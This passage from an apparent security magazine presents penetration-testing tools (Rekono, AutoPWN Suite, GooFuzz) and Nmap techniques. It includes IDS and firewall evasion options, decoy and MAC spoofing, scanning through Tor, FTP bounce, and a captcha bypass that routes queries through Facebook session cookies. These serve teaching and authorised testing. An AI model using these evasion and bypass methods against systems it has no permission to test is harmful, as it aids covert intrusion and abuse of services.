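        wave = [name for name, t in pending.items() if t["needs"] <= available]
        if not wave:
            raise ValueError("unsatisfiable dependencies")
        for name in wave:
            available |= pending.pop(name)["produces"]
        waves.append(sorted(wave))
    return waves

print(schedule(TOOLS))
# [['Nmap'], ['CMSeeK', 'SSH audit'], ['Metasploit']]
```

SSH audit and CMSeeK land in the same wave because neither depends on the other's output, matching the parallel execution described in the text.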
Rekono uses an element called project to organize the different resources involved in the pentesting
exercises: targets, executions, findings and auditors. As the projects group all the pentesting
information, they are very useful to create specific metrics and to restrict the access to the resources. In
the next picture, you can see the details for the project Demo:
Within one project, it's possible to create all the targets included in the pentesting scope. They can be domain names, host addresses, network addresses or IP ranges:
Moreover, it's possible to add more context information about the target, like known open ports, known technologies or known vulnerabilities. This information may be needed to execute some tools outside of pentesting processes. For example, Metasploit looks for known public exploits but needs a CVE to perform the search: if it's executed within a pentesting process, the CVEs can be obtained from previous executions, but if it's executed alone, a known vulnerability is needed. The following image shows an example of this information:
After the target definition, it's possible to execute processes or tools against the targets by creating tasks with the following form:
As you can see, the task intensity can be configured. In the case of pentesting processes, only the tools that support an intensity equal to or lower than the configured one will be executed. Moreover, tasks can be created with a time configuration, so that they run on a specific date, after a specific delay, or periodically. The last option is very interesting, because it allows automatic, recurring checks of targets, so users will notice if new vulnerabilities appear:
After requesting the execution, Rekono will redirect the user to the task page where it’s possible to
review the execution progress and its results. In the next picture, we can see an Nmap execution:
In the case of the process executions, it’s possible to review the pending tool executions and the
findings for each one. In the following example, there are some executions already completed and two
Dirsearch executions still running:
Moreover, if the auditor needs to review the original tool output, it’s possible by clicking on the Output
tab. In the next picture, the original Nmap output is shown:
At project level, it's possible to review the execution history on the tasks page. As you can see, this includes the target, the executed tool or process, the status, the auditor who requested the execution and the execution date:
Finally, the findings identified during the execution of pentesting tasks against the targets, can be
reviewed directly in the platform at project level:
This page displays all the findings by target and includes multiple filtering options. At first, it only displays hosts and findings without relations to other findings, like OSINT data. The user can then select one finding and the page will show the related findings: for example, clicking on a host shows the ports exposed by that host; selecting a port then shows the technologies and vulnerabilities found on it. Moreover, when the user clicks on one finding, its details are shown at the bottom, such as when the finding was detected, by which tool, and other specific finding details.
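The drill-down can be pictured as a nested mapping from hosts to ports to related findings. This is an illustrative sketch only, not Rekono's actual data model, and the sample hosts, ports and CVE IDs are made up:

```python
# Illustrative findings tree (made-up data, not Rekono's schema):
# selecting a host reveals its ports; selecting a port reveals the
# technologies/vulnerabilities found on it.
findings = {
    "10.10.10.5": {                       # host
        22: ["OpenSSH 7.2"],              # port -> related findings
        80: ["Joomla 3.9", "CVE-2021-23132"],
    },
}

def related(host, port=None):
    """Return what the UI would reveal after clicking a host or a port."""
    if port is None:
        return sorted(findings[host])     # ports exposed by the host
    return findings[host][port]           # technologies/vulns on that port

print(related("10.10.10.5"))       # -> [22, 80]
print(related("10.10.10.5", 80))   # -> ['Joomla 3.9', 'CVE-2021-23132']
```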
Supported tools
The tools supported by Rekono can be reviewed on the Tools page, where the user can check the configurations and intensities supported by each tool, the required input parameters for its execution and its potential results. Moreover, as on the processes page, the user can launch tool executions from the tool page:
Nowadays, Rekono supports 17 hacking tools, including:
• Nmap (host discovery & port enumeration): get up hosts, open ports and details about running services
• GitLeaks & GitDumper (HTTP service analysis): get code from exposed Git repositories, then find hardcoded credentials in the source code
• Log4j Scanner (HTTP service analysis): check if a web service is vulnerable to Log4Shell
• CMSeeK (HTTP service analysis): get information about the CMS used by a web service
• OWASP JoomScan (HTTP service analysis): analysis of web services that use Joomla as CMS
Telegram bot
The Rekono platform includes three clients: a web application, a command line interface (CLI) and a Telegram bot. The Rekono bot makes the pentesting process easy, making the platform available to all users from all devices, covering operations from target creation to findings review.
At first, the auditor can create a target using the /newtarget command:
Then it's possible to request the execution of tools or processes against this target using the /tool or /process commands, as shown in the following screenshots:
As you can see, the bot asks the user for the execution details: the target, the tool or process (depending on the command), the configuration to apply if it's a tool execution, the wordlist if needed by some tool, and the execution intensity. The bot then asks the user to confirm the task execution and finally creates the task.
After the executions, if the user has enabled Telegram notifications, they will receive the finding details directly in the Telegram chat. In the next picture, you can see the results of an Nmap execution:
Of course, the Rekono bot is protected by authentication, based on a one-time token that should be
used to link Telegram chats with Rekono users.
User notifications
Rekono supports different notification preferences, based on the content and the platform used to receive the notifications. First, it's possible to configure which execution results the user wants to receive: all the results of their projects or only their own executions. Then, it's possible to configure email notifications or Telegram notifications (already seen in the Telegram bot section). In the next picture, you can see the configuration options:
In the following pictures, you can see an example of user notification via email:
Rekono supports three different user roles: administrators, auditors and readers. User notifications can be very useful to all of them, for different reasons:
• Administrators are often people with responsibilities in the pentesting exercises, so they may be interested in staying up to date on the work progress.
• Auditors need notifications to know the latest findings of their automatic analyses, so they can use this information during their manual testing.
• Readers are often people in charge of following up on vulnerabilities, or responsible for the target system, so they should be informed about the security situation.
Defect-Dojo integration
The findings obtained after task executions are processed automatically by Rekono: CVE information is completed using the NIST NVD API, user notifications are sent, and findings are imported into Defect-Dojo when the integration is enabled for the Rekono project. Defect-Dojo is a vulnerability management platform where:
• findings can be stored to keep traceability of the security situation of the products
• tickets can be created from the findings in bug trackers like JIRA
• the security risk related to the findings can be treated in a proper way
For example, in the next picture you can see the summary information for one Defect-Dojo product:
The findings can be reviewed directly in the Rekono platform, but Rekono is an automation tool, not a vulnerability management tool, and sometimes more advanced vulnerability management is needed. For this reason, Rekono includes an automated integration with Defect-Dojo at project level. The integration is highly customizable, allowing the user to decide how findings should be imported into the platform and creating the Defect-Dojo products and engagements when needed. The Defect-Dojo integration form can be seen in the next picture:
The most comfortable way of working is to enable the automatic creation of products and engagements, letting Rekono deal with all Defect-Dojo elements. Remember that findings will only be imported when synchronization is enabled at project level. Rekono always imports the original tool outputs into Defect-Dojo when supported, so the original tool tests will appear there. The following image shows two Nmap tests imported into Defect-Dojo from the Rekono integration:
Wordlists
As the name says, wordlists are lists of words that can be used during pentesting processes to perform
enumeration or brute force tasks. Rekono can execute tools that may need wordlists to work correctly,
for example, Dirsearch, to find exposed endpoints in web services. For that reason, Rekono also
includes wordlist management features directly in the platform, so users can create their own wordlists
and upload them to Rekono. All the pentesting resources in Rekono, including wordlists, are shared
between all users, so everyone can access the most useful wordlists. By default, Rekono supports
some Kali Linux wordlists, shown in the next picture:
Currently, Rekono is not deployed publicly. The platform is intended to be deployed internally, for specific corporate environments or for personal usage. The project can be deployed in two main ways:
Docker
Rekono can be deployed using a Docker compose environment that includes all the components
needed to run the application easily in all environments. For that, the following commands should be
executed:
$ cd rekono/
$ docker-compose build
$ docker-compose up -d
The number of execution workers can also be configured with an option of the up command.
By default, the user “rekono” with password “rekono” and email “[email protected]" will be created.
This configuration can be changed using the environment variables RKN_USERNAME, RKN_EMAIL
and RKN_PASSWORD. Of course, it’s advised to change the Rekono default credentials.
PIP
If you wish to deploy Rekono in a local environment for personal usage, you can do it using Python and PIP. The goal of this installation method is to use Rekono on an OS like Kali Linux or Parrot OS, where most of the hacking tools supported by the platform are already installed. To install Rekono with this method, the following command should be executed:
$ rekono install
During the install command, the rekono CLI will ask for your initial user information. After completing the installation process, you can manage the Rekono services through the rekono CLI.
This method is very simple, but it isn't advised for production usage because it deploys Rekono in development mode: debug mode is enabled in the frontend, the resources are exposed directly without Nginx, etc. Please use it only for strictly personal usage.
You can check the full Rekono configuration details in the Rekono Wiki: https://github.com/pablosnt/rekono/wiki/5.-Configuration
References
https://github.com/pablosnt/rekono
https://github.com/pablosnt/rekono-cli
https://hakin9.org/rekono-execute-full-pentesting-processes-combining-multiple-hacking-tools-automatically/
https://www.kitploit.com/2022/08/rekono-execute-full-pentesting.html
https://www.defectdojo.org
https://github.com/laramies/theHarvester
https://github.com/maldevel/EmailHarvester
https://github.com/Josue87/EmailFinder
https://nmap.org/
https://github.com/rbsec/sslscan
https://nabla-c0d3.github.io/sslyze/documentation/
https://github.com/jtesta/ssh-audit
https://github.com/ShawnDEvans/smbmap
https://github.com/maurosoria/dirsearch
https://github.com/zricethezav/gitleaks
https://github.com/internetwache/GitTools/tree/master/Dumper
https://github.com/cisagov/log4j-scanner
https://github.com/Tuhinshubhra/CMSeeK/
https://github.com/OWASP/joomscan
https://www.zaproxy.org/
https://github.com/sullo/nikto
https://www.exploit-db.com/searchsploit
https://www.metasploit.com/
AutoPWN Suite:
The Project for Scanning and Exploiting Systems Automatically
by Kaan Gültekin
Overview
In today’s world, hackers are looking for any opportunity to exploit a system and take advantage of it.
This is why it is so important to keep your systems protected from any vulnerabilities that could
potentially allow hackers to breach them at any point in time. In the modern cyber world, attacks are
more frequent than ever before. Criminals have become more sophisticated in their techniques and
continue to evolve their methods to stay one step ahead of cyber security professionals. Even though
every organization is facing cyber threats, not all of them are aware that they are being attacked. Many
businesses fail to recognize the risks their systems face because hackers do not target a single
business or industry in particular; they will attack anyone who does not have adequate security
measures in place. To protect your company from these dangers, you need an automated solution that scans your systems for vulnerabilities and exploits them before a hacker does. Many companies are still in the dark about what is happening around them and how to stop it. This article discusses AutoPWN Suite, a tool that scans for vulnerabilities and exploits them automatically, so you don't have to do it manually.
What is AutoPWN Suite?
AutoPWN Suite is a suite of automated tools developed by me, a cyber security researcher. It is
designed to help companies and individuals protect against cyber threats automatically and efficiently
via an online threat detection and response system. AutoPWN Suite automates the process of scanning
and finding security issues in computer systems. It is a solution that automatically scans, detects, and
exploits all known vulnerabilities in your system without any manual intervention. It is a fully automated
penetration testing tool that helps you find hidden security holes in your system and fix them before a
hacker can take advantage of them. With this solution, you do not have to spend time or effort to scan
your system for vulnerabilities or attempt to fix them manually. Instead, you can simply let AutoPWN
Suite do the work for you so you can focus on more important things. AutoPWN Suite solution is ideal
for businesses of all sizes because it can be used to test any type of system, including web
applications, databases, and networks.
When you start out in penetration testing, one of the first things you learn is how to scan the target host with nmap to find information about the software running on it, including details like versions. You then use this information to search for known vulnerabilities, usually with either a Google search or Searchsploit, a built-in tool in Kali Linux. So my goal was to automate this process.
AutoPWN Suite: What’s in it?
AutoPWN Suite consists of the following tools:
• Nmap scanner: scans the network and detects live hosts on the target network, enumerating the services running on them with additional information, such as their versions, to use for vulnerability detection.
• Keyword generator: after scanning the host, AutoPWN Suite uses a basic algorithm to automatically generate keywords for the later vulnerability search.
• Vulnerability searcher: uses the NIST database API to search for known vulnerabilities based on the keywords generated in the previous step, parsing and saving the results for later use.
• Exploit downloader: as the cherry on top, while we are at it, why not automate the process of downloading exploits too? Using the results from the NIST database API, it searches ExploitDB by CVE ID and automatically downloads the corresponding exploits.
• Reporter: generates a scan report for you. For now, this module can generate reports in TXT, HTML and SVG format. It can also send the generated report via webhook or email automatically, just to make your job easier.
AutoPWN Suite can be very helpful when it comes to uncovering security issues in your network. It can
help you discover weaknesses and issues in the security of networks or servers you are connected to.
You can also use it to check if any of your systems are vulnerable to known exploits or attacks. If you
use the AutoPWN Suite on a daily basis, you will start to notice a difference in the quality of your work
and your team's ability to detect issues. Since AutoPWN Suite is a really extensive tool, it can be used in a wide variety of operations, from testing single hosts to entire networks, web servers, routers or even IoT devices.
The more vulnerabilities your system has, the easier it is for a hacker to gain access to it. This means you need to be careful about the security of your system and how it is configured, or you could accidentally leave your systems open to malicious attacks. One of the best ways to protect your systems from these threats is by using AutoPWN Suite. Here are some of the reasons why:
• Quick and easy testing: all you have to do is enter a few details about your system, and AutoPWN Suite will automatically detect vulnerabilities in your system and exploit them before a hacker can take advantage of them.
• No technical skills required: anyone can use it to scan their system for vulnerabilities; it doesn't really require knowledge of penetration testing or any other cyber security concepts.
• Automatic reporting: another benefit of AutoPWN Suite is that it can automatically generate a report with the information found in your system, such as vulnerabilities. You can then use this information to fix the issues within your system.
In conclusion: AutoPWN Suite uses an nmap TCP SYN scan to enumerate the host and detect the versions of the software running on it. After gathering enough information about the host, AutoPWN Suite uses a basic algorithm to automatically generate a list of "keywords" for searching the NIST vulnerability database. Then, it uses the results from the NIST database to search ExploitDB for known exploits, using CVE IDs. To elaborate a little more, let's break down the scanning process.
Pre-Scanning Process
Before starting, we need a few pieces of information, such as the target. If the user decides to use automatic mode and doesn't specify any targets, AutoPWN Suite will try to detect the target network automatically. This is done by first detecting the network interface that is actively being used; from that interface and its IP address, AutoPWN Suite then derives the target network range.
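That range derivation can be sketched with Python's ipaddress module, assuming the active interface's IP address and netmask have already been detected. This is a simplified illustration under those assumptions, not AutoPWN Suite's exact code:

```python
import ipaddress

def target_range(ip: str, netmask: str) -> str:
    """Derive the network range to scan from the active interface's address."""
    iface = ipaddress.ip_interface(f"{ip}/{netmask}")
    return str(iface.network)  # CIDR of the enclosing local network

# An interface at 192.168.1.37 with a /24 netmask yields the whole subnet:
print(target_range("192.168.1.37", "255.255.255.0"))  # -> 192.168.1.0/24
```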
In this process, AutoPWN Suite first sends packets to every host in the target range to detect live hosts.
After discovering hosts that are live, these hosts are scanned for open ports and software running on
them.
With the information gathered in the previous step, a basic algorithm generates a list of "keywords" to search the NIST database. This process is almost as simple as concatenating the software name with its version.
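A minimal sketch of that concatenation step (the helper name is hypothetical, not the tool's actual function):

```python
def make_keywords(services):
    """Concatenate each detected product name with its version to form
    search keywords, as described above."""
    return [f"{name} {version}".strip() for name, version in services]

# Services as (name, version) pairs detected by the scan:
print(make_keywords([("OpenSSH", "7.2p2"), ("Apache httpd", "2.4.18")]))
# -> ['OpenSSH 7.2p2', 'Apache httpd 2.4.18']
```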
After generating the keywords, they are used to query the NIST vulnerability database API. If the API
returns adequate results, these results are parsed, displayed on the user interface, and saved for later
use.
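As a rough sketch, the lookup amounts to URL-encoding the keyword and hitting the NVD REST API. The endpoint path and the "keywordSearch" parameter below follow the public NVD CVE API 2.0; the exact call AutoPWN Suite makes may differ, so treat this as illustrative (the URL is built and printed here, not fetched):

```shell
# Build an NVD keyword query; the endpoint and parameter name are taken
# from the public NVD CVE API 2.0 and may not match the tool exactly.
keyword="Apache httpd 2.4.46"
encoded=$(printf '%s' "$keyword" | sed 's/ /%20/g')   # minimal URL-encoding
url="https://services.nvd.nist.gov/rest/json/cves/2.0?keywordSearch=${encoded}"
echo "curl -s \"$url\""
```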
Using the information from the previous step, we can now make a request to ExploitDB. By passing the
"X-Requested-With": "XMLHttpRequest" request header, the ExploitDB endpoint can be used
like an API. If the endpoint returns one or more known exploits, each exploit is automatically
downloaded to the “exploits/Software Name/CVE ID/” folder.
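A sketch of that step is shown below. The search parameter name is an assumption about the ExploitDB endpoint, and the CVE ID is just an example; the folder layout mirrors the "exploits/Software Name/CVE ID/" convention described above (the curl command is printed, not run):

```shell
# Query ExploitDB as an ad-hoc API (search parameter name is an assumption)
# and mirror the tool's "exploits/Software Name/CVE ID/" folder layout.
cve="CVE-2021-41773"          # example CVE ID, not a real scan result
software="Apache httpd"
echo "curl -s -H 'X-Requested-With: XMLHttpRequest' 'https://www.exploit-db.com/search?cve=${cve#CVE-}'"
outdir="exploits/${software}/${cve}"
mkdir -p "$outdir"            # exploits would be saved into this folder
```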
If the target is running a website, that site is crawled. Once AutoPWN Suite has a list of usable
endpoints on the website, it looks for parameters and tests them for local file inclusion, SQL injection
and cross-site scripting vulnerabilities. It also does “dirbusting” to find endpoints that might be
interesting.
One of the main goals behind AutoPWN Suite was to make it as easy to use as possible, so that it is
accessible to anyone. After successfully installing AutoPWN Suite, you can run the program with the -y
flag to use fully automatic mode. Using AutoPWN Suite in this mode is recommended, since it's the
intended way of using it. If you don't specify the -y flag, AutoPWN Suite will ask you a few questions
before scanning: the target, whether you would like to scan for vulnerabilities, whether you would like
to automatically download corresponding exploits, and whether you would like to do web
application-based vulnerability analysis. It will also ask you which hosts to scan further after host
discovery, in case you want to scan only a specific host or hosts rather than the entire network.
89
Customizing the scan
If you want to tinker with your scan's settings, you can do that too. Here are some of the options; they
can be really handy in different situations and environments.
• Specify a target: -t
90
Automatic reporting
AutoPWN Suite can also do automatic reporting. You will need to use the -rp flag to specify which
reporting method you want to use.
To send the scan report via email, you need to specify a few options.
To send the scan report via a webhook, you only need to specify the webhook URL with the -rpw flag.
91
Conclusion
Cyber security is a growing concern in the modern world. The number of reported cyber attacks is
increasing year on year, and so is the number that go unsolved. The Internet is full of malicious threats
that you need to protect your systems from, and this trend is expected to continue, as cyber security
professionals are still not well enough equipped to deal with these attacks.
This is why it is important to use solutions like AutoPWN Suite that automatically scan your system for
vulnerabilities and find the corresponding exploits before a hacker does. With this solution, you do not
have to spend time or effort scanning your system for vulnerabilities manually; you can simply let
AutoPWN Suite do the work for you.
Kaan Gültekin
I am a young cyber security researcher and software developer. Here are some of my achievements.
• I was 1st in Turkey and 11th worldwide on TryHackMe, among more than 1 million users.
• A vulnerability scanner I created in less than a month was shared by hundreds of people on Twitter
and starred around 500 times.
• I created a fileless, fully undetectable malware in PowerShell with more features than Meterpreter,
with no prior knowledge of PowerShell or networking.
92
Nmap: The indispensable
by Jafar Untar
What is Nmap?
Nmap is, put simply, the best tool for the scanning stage of a pentesting process, period.
To give a little background, the “Network Mapper” was released in 1997 by Gordon “Fyodor” Lyon,
with the intent of being an open-source security scanner with a “consistent interface and efficient
implementation of all practical port scanning techniques”. Over time, Nmap became a complex and
powerful Swiss-army knife with plenty of new features, such as OS fingerprinting, custom detection
scripts, various parameters for evading filters and firewalls, and different output modes, and it is very
easy to automate and extend with your own scripts. The program also has a GUI version called
Zenmap.
Throughout a black box pentest, the chances of already having information about the target's
infrastructure from previous stages, such as OSINT, are low, so it has to be discovered via network
scanning, and there are a lot of techniques involved. Since this lack of information could lead to being
blocked or detected by the target while executing a simple scan, the recommendation is to use
evasion methods to bypass possible protections and avoid tipping off the defense team. Nmap offers
a variety of ways to do this, and we will talk briefly about them; they allow us to scan networks
equipped with an IDS without being detected or blocked by the IPS, and make it possible to
successfully detect services on the host, since these techniques can evade both firewalls and
detection systems.
2. The packet path through the internet to reach the target in an example of IDS implementation
93
Taking a closer look at a basic scan, e.g., “nmap -v -sV somehost.com”, Nmap's initial action is to
choose a random source port and start sending packets and the service version probes, but
sometimes the host won't accept the request unless a specific port is the source. So, if we add the
“-g [PORT]” or “--source-port [PORT]” parameter, it's possible to change the origin port of the scan,
evading a control that, for example, only permits SSH (port 22) traffic and accepts all connections
coming from that port. Packet fragmentation is another method used to sneak through detection
systems and filters: by splitting the TCP header across several tiny fragments, the packets can all
reach the target without being flagged at first. Although fragmented packets can be difficult for some
programs to handle, the “-f” option is still a valid way to bypass a signature-based IDS.
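As a quick illustration, a version scan combining both evasion options might look like this (the command string is only echoed here rather than executed, and somehost.com is a placeholder target):

```shell
# Illustrative evasion scan: -g 53 sets the source port to 53 (DNS),
# -f fragments the probes. Echoed, not executed; the target is a placeholder.
cmd="nmap -sV -g 53 -f somehost.com"
echo "$cmd"
```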
3. Signature-based IDS
The “-sS” SYN scan is a very common and popular one, but some common filters already block bare
SYN packets. The “-sA” scan type performs an ACK scan instead, sending packets with only the ACK
flag set, which could pass. This mindset should always be applied when using Nmap: assume that the
target may have a firewall or some type of detection system, which leads us to the variety of scan
methods available. A tip is to always (except in rare cases) use the “--open” parameter to limit the
output to open ports only. The OS detection scan sends a lot of TCP, UDP and ICMP probes to the
target and analyzes the results, comparing them with a database of more than 2,600 known operating
system fingerprints and then producing its best guess.
Even though it's common knowledge, it's worth also mentioning the “-T” parameter, which (roughly
speaking) changes the rate at which packets are sent. It offers six timing templates, with 0 being
extremely quiet and slow, 5 being the fastest, and 3 the default. With the lower templates it is possible
to evade some detection systems and be less evident on the target network; the opposite applies if
you are trying to scan an enormous range of IPs, trading stealth for fast execution and packet
dithering. One thing to mention is that sometimes -T5 is so fast that the ISP automatically blocks the
scan, so -T4 is usually a more reasonable speed increase. The -Pn option skips all ping probes, since
many filters already block ICMP packets; this parameter treats all hosts as active and proceeds with
the scan.
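Putting these options together, a combined invocation might look like the following (echoed rather than executed, with a placeholder target; swap -sS for -sA when plain SYN packets are filtered):

```shell
# SYN scan with no ping probes, aggressive-but-sane timing and
# open-ports-only output. Echoed, not executed; target is a placeholder.
cmd="nmap -sS -Pn -T4 --open -p 1-1000 somehost.com"
echo "$cmd"
```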
The example below uses the free TryHackMe CTF room called “idsevasion”, which was made to teach
basic concepts of IDS evasion in a lab with a detection system implemented. As you can see, when
scanning with only a SYN scan, the IDS does not trigger any alerts at all; even though it does not give
complete information, the open ports are revealed. The scan below is a SYN scan returning all open
ports between 1 and 1000, run at maximum timing speed since no blocking was detected.
94
As soon as we switched to a method that uses probes to detect the service version, as follows, the
IDS detected the traffic as coming from Nmap, and even specifically identified the version detection
probes.
95
6. Service version scan (-sV scan) on Nmap
8. IDS Alerts triggered with description of the IDS as Nmap NSE Scripts
In wireless networks, it's also useful to spoof MAC addresses, since some filters target specific
devices, like MAC whitelisting; the “--spoof-mac” parameter can handle that, using either a specific
address or a random one as the source of the packets. When spoofing a MAC address, you also have
the option of simply giving a vendor name; this is often used to impersonate routers (e.g., Cisco). One
of my favorites is the use of decoys to divert attention and confuse the firewall: with the “-D” option, it
is possible to send a lot of fake packets together with the actual scanning packets, giving the real
packets a chance to pass while the decoys are being filtered, since the filter will be busy analyzing all
of them. You can let Nmap randomize the decoy addresses or set them manually.
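Combining both ideas, a decoy scan with a spoofed vendor MAC could look like this (echoed, not executed; all addresses are placeholders, and ME marks where our real address sits in the decoy list):

```shell
# MAC spoofing plus manual decoys. Echoed, not executed; the decoy IPs
# and target are placeholders, ME marks the real source in the decoy list.
cmd="nmap -sS --spoof-mac Cisco -D 10.0.0.5,10.0.0.9,ME,10.0.0.23 192.168.1.10"
echo "$cmd"
```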
Turning to privacy and anonymity, you should consider some extra measures to stay invisible when
using Nmap, since the program normally sends a lot of packets to produce its results and you may be
exposing your source IP too much. Using the “proxychains” utility, it is possible to run Nmap through
the Tor network via a SOCKS4 or SOCKS5 proxy. This improves anonymity but also greatly reduces
scanning speed due to the nature of the Tor network, so tuning the performance parameters of the
scan is a must: set “--min-rtt-timeout” to a bigger number, increasing the probe timeout to avoid
packet loss on this unreliable network, and limit the load with low values of “--max-parallelism” and
“--max-retries”. These parameters give some slack to the irregular connection through the proxy
tunnel, and you will not reveal yourself easily that way.
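A proxied invocation along those lines might be the following (echoed, not executed; the target is a placeholder, and the timeout/parallelism values are only starting points to tune):

```shell
# Nmap over a SOCKS proxy via proxychains. A SOCKS proxy only relays
# full TCP connections, so use -sT (connect scan) with -Pn and -n.
# Echoed, not executed; target and tuning values are placeholders.
cmd="proxychains nmap -sT -Pn -n --min-rtt-timeout 1000ms --max-parallelism 1 --max-retries 2 somehost.com"
echo "$cmd"
```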
Speaking of proxies, there is also a scan technique, enabled with the “-b” option, that abuses an FTP
feature that lets the server act as a proxy connection, exploiting the fact that the FTP server
sometimes has more permissions than usual inside the network. This technique asks the FTP server to
relay a connection to a specific host and port, and the server's response reveals whether that port is
open or not. Even though this is a very well known vulnerability (dating back to 1997), there is always a
vulnerable server out there, and using the ftp-bounce NSE script we can detect systems that can be
exploited this way. This leads us to one of the most powerful features of Nmap, the Nmap Scripting
Engine (NSE).
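For illustration, a bounce scan and the detection script could be invoked as follows (echoed, not executed; both hostnames are placeholders, and -b defaults to an anonymous login unless user:pass@host:port is given explicitly):

```shell
# FTP bounce scan through a relay server, plus the NSE script that checks
# whether a server is bounce-able. Echoed, not executed; hosts are placeholders.
cmd="nmap -Pn -b ftp.example.com -p 21-25,80 target.internal"
echo "$cmd"
echo "nmap --script ftp-bounce -p 21 ftp.example.com"
```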
97
10. Example of NSE Script (http-vuln-cve2014-2126.nse)
11. Nmap ftp-anon script run detecting the possibility of FTP authentication. TryHackme “furthernmap” room
Nmap ships with a lot of different modules for programming NSE scripts, covering many protocols
and RFCs, making it possible to adapt complex PoCs and build exploits that run alongside the
network scan, since the results of an analysis can be fed to the scripting engine through a robust API.
It's also possible to use parallelism, multithreading and mutex functions to develop multiple
concurrent executions through Lua coroutines. For those who want to receive raw packets, the
libpcap support inside the Nsock library lets you set up a packet listener and customize how packets
are received, and if you want to send low-level packets, such as Ethernet frames, you can use the
nmap.new_dnet function, used, for example, by the sniffer-detect script and the Idle Scan.
Conclusion
This tool covers basically the entire reconnaissance stage and, with the wealth of settings you can use
to build a complete network scan and even a vulnerability assessment, Nmap has never left my toolkit.
In fact, I'm still learning about it, because with a tool like this you discover a different use for it every
day. Even with the existence of specialized tools, such as Masscan, designed for extremely large
networks, with proper configuration as shown, changing parallelism levels and running multiple
instances of Nmap, it is possible to achieve similar results and performance.
With that in mind, when you dig into the tool's functionality and algorithms, the completeness of its
repertoire of techniques, its robust probe calculation, its congestion controls, its scripting and much
more become clear. The more you search and discover about this scanning instrument, the better you
understand why the official book, “Nmap Network Scanning: The Official Nmap Project Guide to
Network Discovery and Security Scanning”, has more than 400 pages, showing that, nowadays, Nmap
is still, indeed, indispensable.
98
References:
• https://nmap.org/
• https://www.lua.org/
99
GooFuzz - The Power of
Google Dorks
by David Utón Amaya
What would you think if I told you that there are ways to get files and directories from a web server
without leaving any trace on it? This was the main reason for creating GooFuzz: a quick and easy way
to "fuzz" without leaving evidence in web server log files, using advanced Google search techniques.
GooFuzz is written in Bash and only requires a terminal with Internet access to work. Running the tool
is very simple: you only need to enter a target (URL/IP) and the extensions, file names, subdomains,
folders or parameters that you want to find, either through a dictionary or on the command line,
separated by commas.
100
Now, let's see GooFuzz in action: how about listing office files with the ".pdf" extension and backup
files with the ".bak" and ".old" extensions? I have added the "-d" (delay) parameter to pause between
requests and decrease the chance of Google blocking us for suspicious activity (captcha).
As you may have noticed, I have not specified the number of Google pages ("-p"); I recommend using
this parameter only for intensive searches of subdomains, a specific file/directory, or a relevant
extension. This will spare us some unnecessary blocks.
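A command along these lines reproduces that scan (echoed, not executed). Note that the target flag shown (-t) is an assumption about GooFuzz's syntax based on the parameters described in this article; check the tool's help output for the exact form:

```shell
# Illustrative GooFuzz run: -e extensions, -d delay in seconds.
# The -t target flag is an assumption; verify against the tool's help.
# Echoed, not executed; example.com is a placeholder target.
cmd="./GooFuzz -t example.com -e pdf,bak,old -d 30"
echo "$cmd"
```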
It may also happen that a larger number of extensions needs to be searched, in which case the same
command can be reused, this time passing the path to a file (wordlist).
101
In addition, we may need to list only those PDF files that belong to one particular domain or
subdomain; for that, we can add the "-x" parameter to exclude the subdomains we are not interested
in.
On the other hand, GooFuzz can also be used as a fuzzing tool, taking advantage of advanced Google
Dorks techniques and avoiding leaving any trace on the web server.
Let's put GooFuzz back into action; in the following scenario, we will need to enumerate those files,
paths and parameters that are indexed by Google, making use of a small dictionary with relevant paths
and words.
102
As shown in the image above, with GooFuzz we can enumerate subdomains, directories, variables and
files in a single command, achieving "more for less" (more enumeration with fewer requests), and
silently, of course.
Just as we saw when enumerating files by extension, we can use the same parameter to identify
directories, words or web files separated by commas, without needing to generate a dictionary.
103
Another new feature that several users have asked us for is the addition of four wordlists; let's take
the opportunity to give some tips on how to use them:
• common-extensions.txt: Dictionary with 32 common web extensions, ideal for quick results
together with the "-e" parameter (extensions).
• extensions.txt: Dictionary with almost 900 extensions; it is meant for slow but intensive use
together with the "-b" parameter (bypass), adding a delay (parameter "-d") of between 30 and 60
seconds to avoid abusing the requests-per-minute limit.
• words-100.txt: This dictionary is perfect for obtaining the most relevant files, paths and variables of
a website. It is highly recommended to use it with a delay of between 20 and 30 seconds (parameter
"-d"), or, if you don't want to wait, without a delay but with the Google captcha avoidance option
(parameter "-b cookies.txt").
• words-1000.txt: This is the most complete dictionary, but not the fastest, so it is only
recommended together with the "-b" parameter (bypass) and a delay (parameter "-d") of between 40
and 60 seconds.
I almost forgot! These dictionaries have been chosen from SecLists (thanks for the project!).
In addition, in this version of GooFuzz we have added the ability to list subdomains (parameter "-s");
in conjunction with a page count of between 10 and 20 (parameter "-p"), it is possible to obtain a
large number of the organization's subdomains.
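An intensive subdomain run might therefore look as follows (echoed, not executed). As before, the exact flag combination, including the -t target flag, is an assumption based on the parameters described here; consult GooFuzz's help output:

```shell
# Subdomain enumeration sketch: -s subdomains, -p pages, -d delay.
# Flag combination (including -t) is assumed; check the tool's help.
# Echoed, not executed; example.com is a placeholder target.
cmd="./GooFuzz -t example.com -s -p 15 -d 20"
echo "$cmd"
```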
104
One drawback we can run into is a temporary block by Google. This protection kicks in (as in the web
version) when the search engine detects suspicious activity, at which point we would have to solve a
captcha to continue making requests, an action that can only be performed from a web browser.
But if we look at the second request, we see that we used the "-b" parameter, accompanied by a file
containing cookies from a Facebook account; this allows us to launch the requests through a
"developers.facebook.com" feature, evading the temporary block.
105
Contents of the "cookies.txt" file:
We have to access the Facebook messaging service at https://www.messenger.com, authenticate,
and extract the "c_user" and "xs" cookies; then we create a "cookies.txt" file with that content in this
format: "c_user=<C_USER_COOKIE>; xs=<XS_COOKIE>".
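Creating that file is a one-liner; the placeholders below must be replaced with your real cookie values, and real session cookies should of course never be shared or committed anywhere:

```shell
# Create the cookies.txt file used by the -b bypass. The placeholders
# stand in for your real "c_user" and "xs" values from messenger.com;
# never share or commit real session cookies.
printf 'c_user=%s; xs=%s\n' '<C_USER_COOKIE>' '<XS_COOKIE>' > cookies.txt
cat cookies.txt
```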
106
By taking advantage of the "bypass" functionality, we can use a dictionary of up to 100 words without
being blocked.
https://youtu.be/TyiQTFv4v1w
107
But why do you need my Facebook cookies? Where's the "trick"?
Before explaining what GooFuzz does under the hood to perform this evasion, let it be clear that the
functionality is optional and does not affect normal use of the tool, so if you have used previous
versions, you will not notice any change.
The following image shows a "developers.facebook.com" URL where the tool is making a query to
Google through a native Facebook Developer utility, so the Google captcha does not apply in the same
way as it would from your own web browser (interesting, isn't it?). Of course, to use this Facebook
Developer utility you have to be authenticated, and that is where the cookies come in.
It is also worth adding that, as long as the Facebook session is not closed, the cookies will remain
valid, no matter how many computers running GooFuzz you use.
These are all small examples to introduce the basic operation of the tool. Improvements and new
